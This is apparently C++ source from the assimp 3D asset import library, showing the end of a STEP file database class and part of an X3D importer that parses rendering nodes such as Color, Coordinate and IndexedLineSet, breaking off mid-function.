// objects indexed by ID - this can grow pretty large (i.e. some hundred million
// entries), so use raw pointers to avoid *any* overhead.
typedef std::map<uint64_t,const LazyObject* > ObjectMap;
// objects indexed by their declarative type, but only for those that we truly want
typedef std::set< const LazyObject*> ObjectSet;
typedef std::map<std::string, ObjectSet > ObjectMapByType;
// list of types for which to keep inverse indices for all references
// that the respective objects keep.
// the list keeps pointers to strings in static storage
typedef std::set<const char*> InverseWhitelist;
// references - for each object id the ids of all objects which reference it
// this is used to simulate STEP inverse indices for selected types.
typedef std::step_unordered_multimap<uint64_t, uint64_t > RefMap;
typedef std::pair<RefMap::const_iterator,RefMap::const_iterator> RefMapRange;
private:
DB(std::shared_ptr<StreamReaderLE> reader)
: reader(reader)
, splitter(*reader,true,true)
, evaluated_count()
, schema( NULL )
{}
public:
~DB() {
for(ObjectMap::value_type& o : objects) {
delete o.second;
}
}
public:
uint64_t GetObjectCount() const {
return objects.size();
}
uint64_t GetEvaluatedObjectCount() const {
return evaluated_count;
}
const HeaderInfo& GetHeader() const {
return header;
}
const EXPRESS::ConversionSchema& GetSchema() const {
return *schema;
}
const ObjectMap& GetObjects() const {
return objects;
}
const ObjectMapByType& GetObjectsByType() const {
return objects_bytype;
}
const RefMap& GetRefs() const {
return refs;
}
bool KeepInverseIndicesForType(const char* const type) const {
return inv_whitelist.find(type) != inv_whitelist.end();
}
// get the yet unevaluated object record with a given id
const LazyObject* GetObject(uint64_t id) const {
const ObjectMap::const_iterator it = objects.find(id);
if (it != objects.end()) {
return (*it).second;
}
return NULL;
}
// get an arbitrary object out of the soup with the only restriction being its type.
const LazyObject* GetObject(const std::string& type) const {
const ObjectMapByType::const_iterator it = objects_bytype.find(type);
if (it != objects_bytype.end() && (*it).second.size()) {
return *(*it).second.begin();
}
return NULL;
}
// same, but raise an exception if the object doesn't exist and return a reference
const LazyObject& MustGetObject(uint64_t id) const {
const LazyObject* o = GetObject(id);
if (!o) {
throw TypeError("requested entity is not present",id);
}
return *o;
}
const LazyObject& MustGetObject(const std::string& type) const {
const LazyObject* o = GetObject(type);
if (!o) {
throw TypeError("requested entity of type "+type+"is not present");
}
return *o;
}
#ifdef ASSIMP_IFC_TEST
// evaluate *all* entities in the file. this is a power test for the loader
void EvaluateAll() {
for(ObjectMap::value_type& e :objects) {
**e.second;
}
ai_assert(evaluated_count == objects.size());
}
#endif
private:
// full access only offered to close friends - they should
// use the provided getters rather than messing around with
// the members directly.
LineSplitter& GetSplitter() {
return splitter;
}
void InternInsert(const LazyObject* lz) {
objects[lz->GetID()] = lz;
const ObjectMapByType::iterator it = objects_bytype.find( lz->type );
if (it != objects_bytype.end()) {
(*it).second.insert(lz);
}
}
void SetSchema(const EXPRESS::ConversionSchema& _schema) {
schema = &_schema;
}
void SetTypesToTrack(const char* const* types, size_t N) {
for(size_t i = 0; i < N;++i) {
objects_bytype[types[i]] = ObjectSet();
}
}
void SetInverseIndicesToTrack( const char* const* types, size_t N ) {
for(size_t i = 0; i < N;++i) {
const char* const sz = schema->GetStaticStringForToken(types[i]);
ai_assert(sz);
inv_whitelist.insert(sz);
}
}
HeaderInfo& GetHeader() {
return header;
}
void MarkRef(uint64_t who, uint64_t by_whom) {
refs.insert(std::make_pair(who,by_whom));
}
private:
HeaderInfo header;
ObjectMap objects;
ObjectMapByType objects_bytype;
RefMap refs;
InverseWhitelist inv_whitelist;
std::shared_ptr<StreamReaderLE> reader;
LineSplitter splitter;
uint64_t evaluated_count;
const EXPRESS::ConversionSchema* schema;
};
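// Typical lifecycle sketch (illustrative, based on the friend declarations above;
// "schema", "types" and "inv_types" are placeholders for the concrete conversion
// schema and type whitelists passed in by the individual STEP-based importers):
//
//   std::shared_ptr<IOStream> stream = /* open the STEP file */;
//   STEP::DB* db = STEP::ReadFileHeader(stream);           // parses the HEADER section only
//   STEP::ReadFile(*db, schema, types, n, inv_types, m);   // registers LazyObjects, nothing evaluated yet
//   const STEP::LazyObject* obj = db->GetObject(1);        // records are parsed lazily on dereference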
}
} // end Assimp
#endif // INCLUDED_AI_STEPFILE_H
<|start_filename|>assimp/code/X3DImporter_Rendering.cpp<|end_filename|>
/*
Open Asset Import Library (assimp)
----------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
----------------------------------------------------------------------
*/
/// \file X3DImporter_Rendering.cpp
/// \brief Parsing data from nodes of the X3D "Rendering" set.
/// \date 2015-2016
/// \author <EMAIL>
#ifndef ASSIMP_BUILD_NO_X3D_IMPORTER
#include "X3DImporter.hpp"
#include "X3DImporter_Macro.hpp"
namespace Assimp
{
// <Color
// DEF="" ID
// USE="" IDREF
// color="" MFColor [inputOutput]
// />
void X3DImporter::ParseNode_Rendering_Color()
{
std::string use, def;
std::list<aiColor3D> color;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_REF("color", color, XML_ReadNode_GetAttrVal_AsListCol3f);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_Color, ne);
}
else
{
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_Color(NodeElement_Cur);
if(!def.empty()) ne->ID = def;
((CX3DImporter_NodeElement_Color*)ne)->Value = color;
// check for X3DMetadataObject children.
if(!mReader->isEmptyElement())
ParseNode_Metadata(ne, "Color");
else
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
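// Illustrative X3D snippet (assumed example) showing how the DEF/USE handling above works:
//   <Color DEF="COL" color="1 0 0 0 1 0"/>  <- a new CX3DImporter_NodeElement_Color is created and registered
//   <Color USE="COL"/>                      <- MACRO_USE_CHECKANDAPPLY re-attaches the element defined as "COL"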
// <ColorRGBA
// DEF="" ID
// USE="" IDREF
// color="" MFColorRGBA [inputOutput]
// />
void X3DImporter::ParseNode_Rendering_ColorRGBA()
{
std::string use, def;
std::list<aiColor4D> color;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_REF("color", color, XML_ReadNode_GetAttrVal_AsListCol4f);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_ColorRGBA, ne);
}
else
{
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_ColorRGBA(NodeElement_Cur);
if(!def.empty()) ne->ID = def;
((CX3DImporter_NodeElement_ColorRGBA*)ne)->Value = color;
// check for X3DMetadataObject children.
if(!mReader->isEmptyElement())
ParseNode_Metadata(ne, "ColorRGBA");
else
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
// <Coordinate
// DEF="" ID
// USE="" IDREF
// point="" MFVec3f [inputOutput]
// />
void X3DImporter::ParseNode_Rendering_Coordinate()
{
std::string use, def;
std::list<aiVector3D> point;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_REF("point", point, XML_ReadNode_GetAttrVal_AsListVec3f);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_Coordinate, ne);
}
else
{
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_Coordinate(NodeElement_Cur);
if(!def.empty()) ne->ID = def;
((CX3DImporter_NodeElement_Coordinate*)ne)->Value = point;
// check for X3DMetadataObject children.
if(!mReader->isEmptyElement())
ParseNode_Metadata(ne, "Coordinate");
else
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
// <IndexedLineSet
// DEF="" ID
// USE="" IDREF
// colorIndex="" MFInt32 [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// coordIndex="" MFInt32 [initializeOnly]
// >
// <!-- ColorCoordinateContentModel -->
// ColorCoordinateContentModel is the child-node content model corresponding to IndexedLineSet, LineSet and PointSet. ColorCoordinateContentModel can
// contain any-order Coordinate node with Color (or ColorRGBA) node. No more than one instance of any single node type is allowed.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </IndexedLineSet>
void X3DImporter::ParseNode_Rendering_IndexedLineSet()
{
std::string use, def;
std::list<int32_t> colorIndex;
bool colorPerVertex = true;
std::list<int32_t> coordIndex;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_REF("colorIndex", colorIndex, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_REF("coordIndex", coordIndex, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_IndexedLineSet, ne);
}
else
{
// check data
if((coordIndex.size() < 2) || ((coordIndex.back() == (-1)) && (coordIndex.size() < 3)))
throw DeadlyImportError("IndexedLineSet must contain not empty \"coordIndex\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_IndexedSet(CX3DImporter_NodeElement::ENET_IndexedLineSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_IndexedSet& ne_alias = *((CX3DImporter_NodeElement_IndexedSet*)ne);
ne_alias.ColorIndex = colorIndex;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.CoordIndex = coordIndex;
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("IndexedLineSet");
// check for Color and Coordinate nodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("IndexedLineSet");
MACRO_NODECHECK_LOOPEND("IndexedLineSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
}
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
// <IndexedTriangleFanSet
// DEF="" ID
// USE="" IDREF
// ccw="true" SFBool [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// index="" MFInt32 [initializeOnly]
// normalPerVertex="true" SFBool [initializeOnly]
// solid="true" SFBool [initializeOnly]
// >
// <!-- ComposedGeometryContentModel -->
// ComposedGeometryContentModel is the child-node content model corresponding to X3DComposedGeometryNodes. It can contain Color (or ColorRGBA), Coordinate,
// Normal and TextureCoordinate, in any order. No more than one instance of these nodes is allowed. Multiple VertexAttribute (FloatVertexAttribute,
// Matrix3VertexAttribute, Matrix4VertexAttribute) nodes can also be contained.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </IndexedTriangleFanSet>
void X3DImporter::ParseNode_Rendering_IndexedTriangleFanSet()
{
std::string use, def;
bool ccw = true;
bool colorPerVertex = true;
std::list<int32_t> index;
bool normalPerVertex = true;
bool solid = true;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_RET("ccw", ccw, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_REF("index", index, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_CHECK_RET("normalPerVertex", normalPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_IndexedTriangleFanSet, ne);
}
else
{
// check data
if(index.size() == 0) throw DeadlyImportError("IndexedTriangleFanSet must contain not empty \"index\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_IndexedSet(CX3DImporter_NodeElement::ENET_IndexedTriangleFanSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_IndexedSet& ne_alias = *((CX3DImporter_NodeElement_IndexedSet*)ne);
ne_alias.CCW = ccw;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.CoordIndex = index;
ne_alias.NormalPerVertex = normalPerVertex;
ne_alias.Solid = solid;
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("IndexedTriangleFanSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
if(XML_CheckNode_NameEqual("Normal")) { ParseNode_Rendering_Normal(); continue; }
if(XML_CheckNode_NameEqual("TextureCoordinate")) { ParseNode_Texturing_TextureCoordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("IndexedTriangleFanSet");
MACRO_NODECHECK_LOOPEND("IndexedTriangleFanSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
}
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
// <IndexedTriangleSet
// DEF="" ID
// USE="" IDREF
// ccw="true" SFBool [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// index="" MFInt32 [initializeOnly]
// normalPerVertex="true" SFBool [initializeOnly]
// solid="true" SFBool [initializeOnly]
// >
// <!-- ComposedGeometryContentModel -->
// ComposedGeometryContentModel is the child-node content model corresponding to X3DComposedGeometryNodes. It can contain Color (or ColorRGBA), Coordinate,
// Normal and TextureCoordinate, in any order. No more than one instance of these nodes is allowed. Multiple VertexAttribute (FloatVertexAttribute,
// Matrix3VertexAttribute, Matrix4VertexAttribute) nodes can also be contained.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </IndexedTriangleSet>
void X3DImporter::ParseNode_Rendering_IndexedTriangleSet()
{
std::string use, def;
bool ccw = true;
bool colorPerVertex = true;
std::list<int32_t> index;
bool normalPerVertex = true;
bool solid = true;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_RET("ccw", ccw, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_REF("index", index, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_CHECK_RET("normalPerVertex", normalPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_IndexedTriangleSet, ne);
}
else
{
// check data
if(index.size() == 0) throw DeadlyImportError("IndexedTriangleSet must contain not empty \"index\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_IndexedSet(CX3DImporter_NodeElement::ENET_IndexedTriangleSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_IndexedSet& ne_alias = *((CX3DImporter_NodeElement_IndexedSet*)ne);
ne_alias.CCW = ccw;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.CoordIndex = index;
ne_alias.NormalPerVertex = normalPerVertex;
ne_alias.Solid = solid;
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("IndexedTriangleSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
if(XML_CheckNode_NameEqual("Normal")) { ParseNode_Rendering_Normal(); continue; }
if(XML_CheckNode_NameEqual("TextureCoordinate")) { ParseNode_Texturing_TextureCoordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("IndexedTriangleSet");
MACRO_NODECHECK_LOOPEND("IndexedTriangleSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
}
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
// <IndexedTriangleStripSet
// DEF="" ID
// USE="" IDREF
// ccw="true" SFBool [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// index="" MFInt32 [initializeOnly]
// normalPerVertex="true" SFBool [initializeOnly]
// solid="true" SFBool [initializeOnly]
// >
// <!-- ComposedGeometryContentModel -->
// ComposedGeometryContentModel is the child-node content model corresponding to X3DComposedGeometryNodes. It can contain Color (or ColorRGBA), Coordinate,
// Normal and TextureCoordinate, in any order. No more than one instance of these nodes is allowed. Multiple VertexAttribute (FloatVertexAttribute,
// Matrix3VertexAttribute, Matrix4VertexAttribute) nodes can also be contained.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </IndexedTriangleStripSet>
void X3DImporter::ParseNode_Rendering_IndexedTriangleStripSet()
{
std::string use, def;
bool ccw = true;
bool colorPerVertex = true;
std::list<int32_t> index;
bool normalPerVertex = true;
bool solid = true;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_RET("ccw", ccw, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_REF("index", index, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_CHECK_RET("normalPerVertex", normalPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_IndexedTriangleStripSet, ne);
}
else
{
// check data
if(index.size() == 0) throw DeadlyImportError("IndexedTriangleStripSet must contain not empty \"index\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_IndexedSet(CX3DImporter_NodeElement::ENET_IndexedTriangleStripSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_IndexedSet& ne_alias = *((CX3DImporter_NodeElement_IndexedSet*)ne);
ne_alias.CCW = ccw;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.CoordIndex = index;
ne_alias.NormalPerVertex = normalPerVertex;
ne_alias.Solid = solid;
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("IndexedTriangleStripSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
if(XML_CheckNode_NameEqual("Normal")) { ParseNode_Rendering_Normal(); continue; }
if(XML_CheckNode_NameEqual("TextureCoordinate")) { ParseNode_Texturing_TextureCoordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("IndexedTriangleStripSet");
MACRO_NODECHECK_LOOPEND("IndexedTriangleStripSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
}
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
// <LineSet
// DEF="" ID
// USE="" IDREF
// vertexCount="" MFInt32 [initializeOnly]
// >
// <!-- ColorCoordinateContentModel -->
// ColorCoordinateContentModel is the child-node content model corresponding to IndexedLineSet, LineSet and PointSet. ColorCoordinateContentModel can
// contain any-order Coordinate node with Color (or ColorRGBA) node. No more than one instance of any single node type is allowed.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </LineSet>
void X3DImporter::ParseNode_Rendering_LineSet()
{
std::string use, def;
std::list<int32_t> vertexCount;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_REF("vertexCount", vertexCount, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_LineSet, ne);
}
else
{
// check data
if(vertexCount.size() == 0) throw DeadlyImportError("LineSet must contain a non-empty \"vertexCount\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_Set(CX3DImporter_NodeElement::ENET_LineSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_Set& ne_alias = *((CX3DImporter_NodeElement_Set*)ne);
ne_alias.VertexCount = vertexCount;
// create CoordIdx
size_t coord_num = 0;
ne_alias.CoordIndex.clear();
for(std::list<int32_t>::const_iterator vc_it = ne_alias.VertexCount.begin(); vc_it != ne_alias.VertexCount.end(); vc_it++)
{
if(*vc_it < 2) throw DeadlyImportError("LineSet. vertexCount shall be greater than or equal to two.");
for(int32_t i = 0; i < *vc_it; i++) ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num++));// add vertices indices
ne_alias.CoordIndex.push_back(-1);// add face delimiter.
}
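// Worked example (illustrative): for vertexCount="3 2" the loop above produces
// CoordIndex = { 0, 1, 2, -1, 3, 4, -1 }, i.e. one polyline per count, each terminated by -1.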
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("LineSet");
// check for Color and Coordinate nodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("LineSet");
MACRO_NODECHECK_LOOPEND("LineSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
}
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
// <PointSet
// DEF="" ID
// USE="" IDREF
// >
// <!-- ColorCoordinateContentModel -->
// ColorCoordinateContentModel is the child-node content model corresponding to IndexedLineSet, LineSet and PointSet. ColorCoordinateContentModel can
// contain any-order Coordinate node with Color (or ColorRGBA) node. No more than one instance of any single node type is allowed.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </PointSet>
void X3DImporter::ParseNode_Rendering_PointSet()
{
std::string use, def;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_PointSet, ne);
}
else
{
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_IndexedSet(CX3DImporter_NodeElement::ENET_PointSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("PointSet");
// check for Color and Coordinate nodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("PointSet");
MACRO_NODECHECK_LOOPEND("PointSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
}
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
// <TriangleFanSet
// DEF="" ID
// USE="" IDREF
// ccw="true" SFBool [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// fanCount="" MFInt32 [inputOutput]
// normalPerVertex="true" SFBool [initializeOnly]
// solid="true" SFBool [initializeOnly]
// >
// <!-- ComposedGeometryContentModel -->
// ComposedGeometryContentModel is the child-node content model corresponding to X3DComposedGeometryNodes. It can contain Color (or ColorRGBA), Coordinate,
// Normal and TextureCoordinate, in any order. No more than one instance of these nodes is allowed. Multiple VertexAttribute (FloatVertexAttribute,
// Matrix3VertexAttribute, Matrix4VertexAttribute) nodes can also be contained.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </TriangleFanSet>
void X3DImporter::ParseNode_Rendering_TriangleFanSet()
{
std::string use, def;
bool ccw = true;
bool colorPerVertex = true;
std::list<int32_t> fanCount;
bool normalPerVertex = true;
bool solid = true;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_RET("ccw", ccw, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_REF("fanCount", fanCount, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_CHECK_RET("normalPerVertex", normalPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_TriangleFanSet, ne);
}
else
{
// check data
if(fanCount.size() == 0) throw DeadlyImportError("TriangleFanSet must contain a non-empty \"fanCount\" attribute.");
// create and if needed - define new geometry object.
